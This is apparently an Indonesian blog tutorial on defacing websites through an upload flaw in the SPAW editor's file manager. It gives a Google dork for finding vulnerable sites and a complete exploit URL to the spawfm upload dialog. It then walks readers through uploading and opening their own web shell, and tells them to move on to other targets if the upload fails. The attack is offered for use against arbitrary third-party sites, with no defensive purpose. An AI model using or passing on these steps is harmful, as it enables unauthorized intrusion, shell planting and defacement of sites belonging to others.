Cara yang satu ini cukup mudah dilakukan. Dengan menggunakan metode spaw uploads, kita bisa mengupload shell kita untuk melakukan deface terhadap web tersebut.
Tutornya :
1. Ketik dork berikut ke google :
inurl:”spaw2/uploads/files/”
NB : Dorknya bisa kalian ubah menurut kreativitas kalian masing-masing
3. Setelah dibuka. Masukkan exploit ini :
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Contoh :
www.site.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
4. Jika sudah dimasukkan exploitnya, halaman pada website tersebut akan seperti ini :
5. Lalu udah menjadi files, Pilih "Choose File" masukan shell anda, dan Upload. Atau liat seperti gambar di atas
6. Jika sudah lihat di page tersebut sudah ke upload kah shell anda? Jika belum coba cari target lainnya, dan jika sudah akan ada file anda seperti ini :
7. Untuk melihat shell anda tinggal klik shell yang sudah di upload tadi. Klik "Download File" , dan otomatis browser anda akan membuka tab baru dengan link shell kesayangan anda yang sudah anda upload tadi.
Sekian ilmu yang dapat saya berikan.
Selamat mencoba :)
No comments:
Post a Comment
Jika masih bingung atau apa dengan artikel ini, bisa langsung comment di bawah ini :)